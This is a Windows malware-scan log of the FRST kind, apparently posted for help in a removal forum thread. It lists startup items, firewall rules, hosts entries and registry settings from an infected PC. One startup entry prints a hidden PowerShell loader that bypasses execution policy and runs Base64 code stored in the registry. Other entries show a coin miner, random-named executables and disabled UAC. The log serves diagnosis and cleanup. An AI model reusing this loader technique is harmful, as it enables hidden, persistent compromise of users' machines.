2016-02-08 20:45 - 2018-10-24 17:31 - 000098024 _____ () C:\Users\Betts\AppData\Roaming\Spotify\libegl.dll
2018-10-20 06:40 - 2018-10-20 06:40 - 025607152 _____ () C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.dll
2018-09-20 14:32 - 2018-09-20 14:32 - 000423408 _____ () C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\sqlite.dll
2018-09-20 14:32 - 2018-09-20 14:32 - 082922992 _____ () C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\libcef.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:05E9FFE5 [133]
AlternateDataStreams: C:\Users\Betts\Cookies:Z9Vd5wjyCnrKb1R3FN3u9uOY [2266]
AlternateDataStreams: C:\Users\Betts\Local Settings:Sr8HGrESrmGgd8t2MMMzW7w [2006]
AlternateDataStreams: C:\Users\Betts\AppData\Local:Sr8HGrESrmGgd8t2MMMzW7w [2006]
AlternateDataStreams: C:\Users\Betts\AppData\Local\Application Data:Sr8HGrESrmGgd8t2MMMzW7w [2006]
AlternateDataStreams: C:\Users\Betts\AppData\Local\Yl0t0Zf7okQM9:7Gt0kJJ90PbKkfYIBRyj [2158]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AppXSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BFE => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\camsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ClipSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dps => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\lfsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MpsSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\msiserver => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\semgrsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SharedAccess => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\shellhwdetection => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\TokenBroker => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\TweakingRemoveSafeBoot => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vss => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WSService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppXSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\camsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ClipSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dps => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\lfsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\msiserver => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SamSs => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\semgrsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\shellhwdetection => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srv => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srv2 => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srvnet => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TokenBroker => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TweakingRemoveSafeBoot => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vss => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRkrn => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRSVC => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WSService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\.DEFAULT\Software\Classes\exefile: "%1" %* <==== ATTENTION
HKU\.DEFAULT\Software\Classes\.exe: exefile => "%1" %* <==== ATTENTION
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Classes\exefile: "%1" %* <==== ATTENTION
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Classes\.exe: exefile => "%1" %* <==== ATTENTION
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Classes\.scr: AutoCADScriptFile => C:\Windows\system32\notepad.exe "%1"

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 10:34 - 2016-09-03 20:09 - 000001028 ____R C:\Windows\system32\Drivers\etc\hosts

0.0.0.0 pubads.g.doubleclick.net
0.0.0.0 securepubads.g.doubleclick.net
0.0.0.0 www.googletagservices.com
0.0.0.0 gads.pubmatic.com
0.0.0.0 ads.pubmatic.com
0.0.0.0 spclient.wg.spotify.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 114.108.195.1 - 114.108.193.201
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: ) (ConsentPromptBehaviorUser: ) (EnableLUA: 0)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

If an entry is included in the fixlist, it will be removed.

MSCONFIG\Services: AdAppMgrSvc => 2
MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: AdobeUpdateService => 2
MSCONFIG\Services: AGSService => 2
MSCONFIG\Services: AirPrint => 2
MSCONFIG\Services: Apple Mobile Device Service => 2
MSCONFIG\Services: ArcService => 3
MSCONFIG\Services: Bonjour Service => 2
MSCONFIG\Services: Droid4XService => 2
MSCONFIG\Services: FlexNet Licensing Service 64 => 3
MSCONFIG\Services: GarenaPlatform => 2
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: gusvc => 3
MSCONFIG\Services: Hadouken => 2
MSCONFIG\Services: HitmanProScheduler => 2
MSCONFIG\Services: IDriverT => 3
MSCONFIG\Services: iPod Service => 3
MSCONFIG\Services: KvAppService => 2
MSCONFIG\Services: LMS => 2
MSCONFIG\Services: LolScreenSaverService => 2
MSCONFIG\Services: MBAMService => 2
MSCONFIG\Services: MozillaMaintenance => 3
MSCONFIG\Services: NvContainerLocalSystem => 3
MSCONFIG\Services: NVDisplay.ContainerLocalSystem => 2
MSCONFIG\Services: NVU => 2
MSCONFIG\Services: PassThru Service => 2
MSCONFIG\Services: Realtek11nSU => 2
MSCONFIG\Services: rpcapd => 3
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: ss_conn_service => 2
MSCONFIG\Services: Steam Client Service => 3
MSCONFIG\Services: TuneUp.UtilitiesSvc => 2
MSCONFIG\Services: UNS => 2
MSCONFIG\Services: WMS => 2
MSCONFIG\Services: WRSVC => 2
MSCONFIG\Services: WsAppService => 2
MSCONFIG\Services: WsDrvInst => 3
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Install LastPass FF RunOnce.lnk => C:\Windows\pss\Install LastPass FF RunOnce.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Install LastPass IE RunOnce.lnk => C:\Windows\pss\Install LastPass IE RunOnce.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^Betts^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^6879fe793de5f826544fc9bd3b3ae212.exe => C:\Windows\pss\6879fe793de5f826544fc9bd3b3ae212.exe.Startup
MSCONFIG\startupfolder: C:^Users^Betts^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^icfgratf.lnk => C:\Windows\pss\icfgratf.lnk.Startup
MSCONFIG\startupfolder: C:^Users^Betts^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Monitor Ink Alerts - HP Deskjet Ink Adv 2010 K010.lnk => C:\Windows\pss\Monitor Ink Alerts - HP Deskjet Ink Adv 2010 K010.lnk.Startup
MSCONFIG\startupfolder: C:^Users^Betts^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^PdaNet Desktop.lnk => C:\Windows\pss\PdaNet Desktop.lnk.Startup
MSCONFIG\startupfolder: C:^Users^Betts^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^RzKHAzNO5B2KT5V.lnk => C:\Windows\pss\RzKHAzNO5B2KT5V.lnk.Startup
MSCONFIG\startupreg: 1CC1D7FC1BE52E567AEF850DA74CD4EE2A175F87._service_run => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=service /prefetch:8
MSCONFIG\startupreg: 6879fe793de5f826544fc9bd3b3ae212 => "C:\ProgramData\audio.exe" ..
MSCONFIG\startupreg: Adobe Creative Cloud => "C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe" --showwindow=false --onOSstartup=true
MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
MSCONFIG\startupreg: Aimersoft Helper Compact.exe => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe
MSCONFIG\startupreg: Akamai NetSession Interface => "C:\Users\Betts\AppData\Local\Akamai\netsession_win.exe"
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: Autodesk Desktop App => "C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe" -tray
MSCONFIG\startupreg: Autodesk Sync => C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe
MSCONFIG\startupreg: BCSSync => "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
MSCONFIG\startupreg: Dropbox Update => "C:\Users\Betts\AppData\Local\Dropbox\Update\DropboxUpdate.exe" /c
MSCONFIG\startupreg: HP Software Update => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe
MSCONFIG\startupreg: iFunBox => C:\Program Files (x86)\I-Funbox DevTeam\iFunBox_x64.exe /tray
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: KeepVidMusicService => C:\Program Files (x86)\Keepvid\KeepVid Music (Desktop)\KeepVidMusicService.exe
MSCONFIG\startupreg: KiesTrayAgent => C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe
MSCONFIG\startupreg: Malwarebytes TrayApp => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe
MSCONFIG\startupreg: OpwareSE4 => "C:\Program Files (x86)\ScanSoft\OmniPageSE4.0\OpwareSE4.exe"
MSCONFIG\startupreg: ProfilerU => C:\Program Files\Saitek\SD6\Software\ProfilerU.exe
MSCONFIG\startupreg: SaiMfd => C:\Program Files\Saitek\SD6\Software\SaiMfd.exe
MSCONFIG\startupreg: Spotify => C:\Users\Betts\AppData\Roaming\Spotify\Spotify.exe --autostart
MSCONFIG\startupreg: Spotify Web Helper => C:\Users\Betts\AppData\Roaming\Spotify\SpotifyWebHelper.exe --autostart
MSCONFIG\startupreg: SSBkgdUpdate => "C:\Program Files (x86)\Common Files\Scansoft Shared\SSBkgdUpdate\SSBkgdupdate.exe" -Embedding -boot
MSCONFIG\startupreg: WRSVC => "C:\Program Files\Webroot\WRSA.exe" -ul
MSCONFIG\startupreg: {C656898E-5C97-4D32-B1BD-4DA1679104E8} => C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\HCLUXGUXIRVGPI').NIWFUVUXRL)));

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{38FC2823-8875-481D-B4DB-0711A4BD8FDC}] => (Allow) C:\Program Files (x86)\Realtek\Wireless LAN Utility\RtWLan.exe
FirewallRules: [{2CE36BB2-2328-40BF-848E-8DD65E92BB77}] => (Allow) C:\Program Files (x86)\Realtek\Wireless LAN Utility\RtWLan.exe
FirewallRules: [{F3CBCB5D-B86F-48E9-BB3D-6CF5C5984533}] => (Allow) LPort=1542
FirewallRules: [{2C86EA06-4CE1-4987-856A-BBD5C0EF71AA}] => (Allow) LPort=1542
FirewallRules: [{673CA603-3E84-4345-B6B2-B2582D305262}] => (Allow) LPort=53
FirewallRules: [{67D898C8-B9FF-4C21-A9AD-A1A0C5DBE3A4}] => (Allow) C:\Users\Betts\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{5226B354-B1F3-46B7-9866-5AB20B1F2B4C}] => (Allow) C:\Users\Betts\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{09E540DC-F565-4FAD-B045-348305BBACC8}] => (Allow) C:\Program Files\HP\HP Deskjet Ink Adv 2010 K010\Bin\USBSetup.exe
FirewallRules: [{3F930024-B487-4904-8EAB-CCC9814BB83A}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{688862EA-9456-4289-88D3-DBFC65C3A976}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{2BA7FD68-87B6-4A30-87DE-22F53B759336}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{930B4E15-21A2-4842-9A20-F7CDEEEA62D2}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [TCP Query User{7CF602F0-2FC0-412C-9088-4D6D21FFE0EB}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{4925DBFF-CE1F-437C-99C4-589C0D560F4B}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [TCP Query User{AA399512-787C-44EE-A82C-24DE43172677}C:\users\betts\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\betts\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [UDP Query User{BDA7EC6C-3435-4752-963D-FBA0C44E765B}C:\users\betts\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\betts\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [{16AE05FF-46DD-44B4-B291-2077CAA0BA12}] => (Allow) C:\Users\Betts\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{BCE2F750-AABB-4599-8D3F-927600AF2CBD}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{7AD8BDE1-3DF9-4ED8-8C35-AAEC94D33970}] => (Allow) LPort=2869
FirewallRules: [{F146702D-DAA7-4530-B38D-D8C3602B3486}] => (Allow) LPort=1900
FirewallRules: [{EC82EEB3-660D-46C1-AA13-A7C3E9E00535}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{AF4FF19E-6F37-428D-8A0B-5DB6C007292D}] => (Allow) LPort=8370
FirewallRules: [{6150B8A3-726E-49FC-868E-FEECC4889ADD}] => (Allow) LPort=8370
FirewallRules: [{F59B944A-6517-434E-8BD2-552E49695214}] => (Allow) C:\Program Files (x86)\GarenaLoLPH\GameData\Apps\LoLPH\Game\League of Legends.exe
FirewallRules: [{DBA2072D-FE6E-400E-9049-A70F9DFFFBB3}] => (Allow) C:\Program Files (x86)\GarenaLoLPH\GameData\Apps\LoLPH\Game\League of Legends.exe
FirewallRules: [{8BFA5969-DBAF-48BC-8D17-B1C6F1224837}] => (Allow) C:\Program Files (x86)\AirPrint\airprint.exe
FirewallRules: [TCP Query User{DF334884-AB9F-4138-B07B-4E3F0189D35A}C:\program files (x86)\printershare\paconsole.exe] => (Allow) C:\program files (x86)\printershare\paconsole.exe
FirewallRules: [UDP Query User{59CC10B2-CDFE-46E4-A895-7606B32727DD}C:\program files (x86)\printershare\paconsole.exe] => (Allow) C:\program files (x86)\printershare\paconsole.exe
FirewallRules: [TCP Query User{4A4365C4-2414-4E5B-B946-385D117BDFB5}C:\program files (x86)\printershare\paconsole.exe] => (Block) C:\program files (x86)\printershare\paconsole.exe
FirewallRules: [UDP Query User{2409DEFB-FF6E-4037-A062-B6E645F2149F}C:\program files (x86)\printershare\paconsole.exe] => (Block) C:\program files (x86)\printershare\paconsole.exe
FirewallRules: [{B920C7D2-B0FE-4FEE-9288-9FD6F1BF60F7}] => (Allow) C:\Program Files\HP\HP Deskjet 2510 series\Bin\USBSetup.exe
FirewallRules: [{AC4E9A9D-77B4-440C-9A81-C2CC136C5F54}] => (Allow) LPort=8370
FirewallRules: [{C682952A-D6C1-40B0-9C07-6F39BBC89F9A}] => (Allow) LPort=8370
FirewallRules: [{898892CE-EA9B-4726-A816-2581F93BA3B1}] => (Allow) C:\Program Files (x86)\GarenaLoLPH\GameData\Apps\LoLPH\Game\League of Legends.exe
FirewallRules: [{A406CB39-B19C-4A9B-B01C-2AEE3193F7BD}] => (Allow) C:\Program Files (x86)\GarenaLoLPH\GameData\Apps\LoLPH\Game\League of Legends.exe
FirewallRules: [{FF6FEBDD-0057-4F02-9352-A750B6EA1D20}] => (Allow) C:\Program Files (x86)\PCData\cudaminer.exe
FirewallRules: [{A9F64B4C-28C4-4A45-8526-A604438D5282}] => (Allow) C:\Program Files (x86)\PCData\cudaminer.exe
FirewallRules: [{C881CB14-DA97-4438-9394-270CE79B19B4}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{61927E13-DA49-4727-A060-B9C2B98CF5A1}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{54271DB6-ADA7-4801-8B6D-F5146085EF31}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [{8DCCC0F5-804A-4253-B936-A9E52B38AD13}] => (Allow) C:\GarenaDownload\Games\blackshot\Blackshot_GarenaPlus_Installer.exe
FirewallRules: [{99CF3F38-5697-45AF-9923-4161FFC019B8}] => (Allow) C:\GarenaDownload\Games\blackshot\Blackshot_GarenaPlus_Installer.exe
FirewallRules: [{081BCF64-D3F8-4ED6-B9BA-31F475F3873B}] => (Allow) C:\Program Files (x86)\Battlelog Web Plugins\Sonar\0.70.4\SonarHost.exe
FirewallRules: [{20B5EC6D-E2E2-4E79-A90C-5DC063CD506B}] => (Allow) C:\Program Files (x86)\Battlelog Web Plugins\Sonar\0.70.4\SonarHost.exe
FirewallRules: [TCP Query User{99972C58-BFC7-4586-9EB6-776B56C63C08}C:\users\betts\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\betts\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{BAF658B2-154E-4F20-98EA-BDAA7696FC04}C:\users\betts\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\betts\appdata\roaming\spotify\spotify.exe
FirewallRules: [{0D1F6826-BC17-4608-BD17-2A1CF5ABA034}] => (Block) C:\users\betts\appdata\roaming\spotify\spotify.exe
FirewallRules: [{AEE1F1C9-8E9B-422A-AD55-3BA7891501EA}] => (Block) C:\users\betts\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{5CFA7A9A-DAD1-4EE4-B2AB-9AA4F8C624DE}C:\windows\syswow64\javaw.exe] => (Allow) C:\windows\syswow64\javaw.exe
FirewallRules: [UDP Query User{D9DBB5CB-B9C6-42C3-8B20-1289FEB9F5CD}C:\windows\syswow64\javaw.exe] => (Allow) C:\windows\syswow64\javaw.exe
FirewallRules: [{DA421E0D-BE2C-4FDE-9CE1-7B748E8D0A49}] => (Block) C:\windows\syswow64\javaw.exe
FirewallRules: [{A916441E-AD9E-43CA-8D9F-EBA03AB3F06E}] => (Block) C:\windows\syswow64\javaw.exe
FirewallRules: [{20CBE20B-FCD6-40D1-8D2D-349AB644075A}] => (Allow) LPort=6993
FirewallRules: [{40CFA6C9-7332-46F5-93DF-CAD9B029F9DA}] => (Allow) LPort=6993
FirewallRules: [{3BA636CC-291E-4C5C-AD9F-68857276B5B2}] => (Allow) LPort=6887
FirewallRules: [{A28D90B8-AD90-418E-A701-7754FF60198E}] => (Allow) LPort=6887
FirewallRules: [{20A92978-3821-40F9-86E3-761F950A6782}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{4B4957A1-CE42-4924-9B7A-B587B1B0CFCE}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{CA82FB53-A838-4668-9D02-EF8DA7890A83}] => (Allow) LPort=6920
FirewallRules: [{620066E0-8634-4DFA-9AAF-22DFB8ACB685}] => (Allow) LPort=6920
FirewallRules: [{BB9CDCBD-6587-4B50-B179-4C03EFDC1673}] => (Allow) LPort=53515
FirewallRules: [{D9AD76E5-98A4-4B3D-B86F-FA927911EDBC}] => (Allow) LPort=53515
FirewallRules: [{35EB427C-8DAA-45AE-8672-7D5489F4AF90}] => (Allow) LPort=6956
FirewallRules: [{ED21F6E1-C41D-411A-8AC0-67A404A66071}] => (Allow) LPort=6956
FirewallRules: [{7C8C1282-F6BE-4FB5-BA02-0E3D63BBB46D}] => (Allow) LPort=6961
FirewallRules: [{F1C385E5-8377-4EE9-B037-6B85BD288355}] => (Allow) LPort=6961
FirewallRules: [{40ADEBA9-AEFE-4DC7-8115-3269C2C53DC4}] => (Allow) LPort=6943
FirewallRules: [{1DF7A37D-6F36-4C6F-B47B-F8F76499DC7D}] => (Allow) LPort=6943
FirewallRules: [{52262082-F68E-4750-9D70-CC4540BC21B2}] => (Allow) LPort=6954
FirewallRules: [{058AE8F6-1C0A-4C97-A0EF-3F93D6D49B3D}] => (Allow) LPort=6954
FirewallRules: [{6AC9E325-4848-4C3D-A0B4-F25E6052EDCF}] => (Allow) LPort=6901
FirewallRules: [{4B42FEA5-6D01-492D-8C4F-5F3F5B7B361D}] => (Allow) LPort=6901
FirewallRules: [{50CD4BB1-2AD9-4E26-8DF6-A799AB2A5D8B}] => (Allow) LPort=6986
FirewallRules: [{1A506B80-DD9F-4AC8-8FDF-D7AA9997020D}] => (Allow) LPort=6986
FirewallRules: [TCP Query User{17D22E81-EBAC-41FF-A960-4C67DED49F76}C:\program files (x86)\counter-strike 1.6\hl.exe] => (Allow) C:\program files (x86)\counter-strike 1.6\hl.exe
FirewallRules: [UDP Query User{B380394B-4F8C-4069-9D8E-55B4D4C2A09A}C:\program files (x86)\counter-strike 1.6\hl.exe] => (Allow) C:\program files (x86)\counter-strike 1.6\hl.exe
FirewallRules: [{CEC99383-1E65-4A5E-8543-A452A66648B0}] => (Block) C:\program files (x86)\counter-strike 1.6\hl.exe
FirewallRules: [{B8FB3085-D5EF-4E53-8590-A3E953C6B741}] => (Block) C:\program files (x86)\counter-strike 1.6\hl.exe
FirewallRules: [{E24C0618-016D-405B-A5E5-4F5B2BFCF08F}] => (Allow) C:\Program Files (x86)\Hadouken\hadouken.exe
FirewallRules: [{19106E0F-92C5-449A-BBA7-4F5328B98CFA}] => (Allow) LPort=6955
FirewallRules: [{FE8DBF92-38B3-41CB-BD46-3B41B7DC5B9D}] => (Allow) LPort=6955
FirewallRules: [{C97F8183-FD68-4C06-BCD9-33A233B40AB3}] => (Allow) LPort=6969
FirewallRules: [{82A4EFBB-175C-49CC-8B38-BEACBA7260E9}] => (Allow) LPort=6969
FirewallRules: [{8A58C784-5BCC-4983-812E-1A532C351AA2}] => (Allow) LPort=6894
FirewallRules: [{1C3CA90A-48FC-44CD-887B-A45052741253}] => (Allow) LPort=6894
FirewallRules: [{185DEF5D-A0D3-4881-AB2C-48E5BD8A37B9}] => (Allow) LPort=6893
FirewallRules: [{D14E1C3C-C378-459C-A727-3EC8C699EAD4}] => (Allow) LPort=6893
FirewallRules: [{0DF4F7B1-2417-430F-8B89-DA2E9D332ABF}] => (Allow) LPort=6959
FirewallRules: [{18A9FAA0-5CC2-451B-A530-66EEB249E223}] => (Allow) LPort=6959
FirewallRules: [{35CD5408-85C3-41A1-A341-AD394632EA46}] => (Allow) LPort=6918
FirewallRules: [{D84516E6-6258-4F99-A9DF-0585F5F6411D}] => (Allow) LPort=6918
FirewallRules: [{9F6BF43D-9F02-4914-98DD-2B55DB82509F}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [{1FA0AAD9-B93F-41EA-AF69-1D6DB4452E8B}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [{C10CD7BB-4934-49B3-980E-329F3F4A1CA7}] => (Allow) LPort=6953
FirewallRules: [{55A0DD9D-CBD8-4455-BEFD-B8ACE807A192}] => (Allow) LPort=6953
FirewallRules: [{064693B1-2836-40F9-BF98-8D5BA8DE555B}] => (Allow) LPort=6940
FirewallRules: [{D79DD6F2-512D-41D0-984E-9A0762254AF6}] => (Allow) LPort=6940
FirewallRules: [{A05C47B6-CDA9-4652-994A-05109349549F}] => (Allow) LPort=6917
FirewallRules: [{DB826D5D-2091-4FDC-A756-E90DE15AADB5}] => (Allow) LPort=6917
FirewallRules: [{57F0F001-9E82-49BB-8CD3-E028E35AFD5A}] => (Allow) LPort=6997
FirewallRules: [{9620B5A5-C4F8-4FAE-B6C3-4A65DBCE2FA4}] => (Allow) LPort=6997
FirewallRules: [{59A0140A-76DF-4E52-8DCA-FDC42E6F3EE1}] => (Allow) LPort=6881
FirewallRules: [{6E04FBBB-E632-4E64-ABFA-7A025DE00BBC}] => (Allow) LPort=6881
FirewallRules: [{75C78F7A-8D0B-4A8E-B585-2EC9279CF145}] => (Allow) LPort=6945
FirewallRules: [{B274B02C-ACE4-4FCF-BBA2-ADE9498DD7F7}] => (Allow) LPort=6945
FirewallRules: [TCP Query User{713356C3-B8A0-4A2F-83A7-5085A208FCC5}C:\program files (x86)\deluge\deluge.exe] => (Allow) C:\program files (x86)\deluge\deluge.exe
FirewallRules: [UDP Query User{A0FD9750-30E1-433A-986C-F21221B795C9}C:\program files (x86)\deluge\deluge.exe] => (Allow) C:\program files (x86)\deluge\deluge.exe
 

Broni

Malware Annihilator
FirewallRules: [{D54C28D4-1A2D-4CC6-A8F7-DAEC9C1043F7}] => (Block) C:\program files (x86)\deluge\deluge.exe
FirewallRules: [{D365CEB7-697E-4633-B046-AE50DC34571D}] => (Block) C:\program files (x86)\deluge\deluge.exe
FirewallRules: [{CD0510F3-16FB-4CBE-8FB4-6C32A64F1C6A}] => (Allow) LPort=6921
FirewallRules: [{0F841E01-98EC-4480-BA33-77733187B0D7}] => (Allow) LPort=6921
FirewallRules: [{F09E290D-2F1A-4CAA-818B-F829AB1FAF97}] => (Allow) LPort=6937
FirewallRules: [{43B8AA88-4BD8-4FF2-A3A9-05919231685F}] => (Allow) LPort=6937
FirewallRules: [{E28BD6BB-B51E-4376-A690-A3D08CA95738}] => (Allow) LPort=6896
FirewallRules: [{040EF130-CEA0-4197-B7EB-A5FEFFC896E9}] => (Allow) LPort=6896
FirewallRules: [TCP Query User{58149CDE-0D65-45DD-A39C-4981BEE6D1F0}C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe] => (Allow) C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe
FirewallRules: [UDP Query User{44B72B2E-6F9C-4BDC-B150-FD02AC264108}C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe] => (Allow) C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe
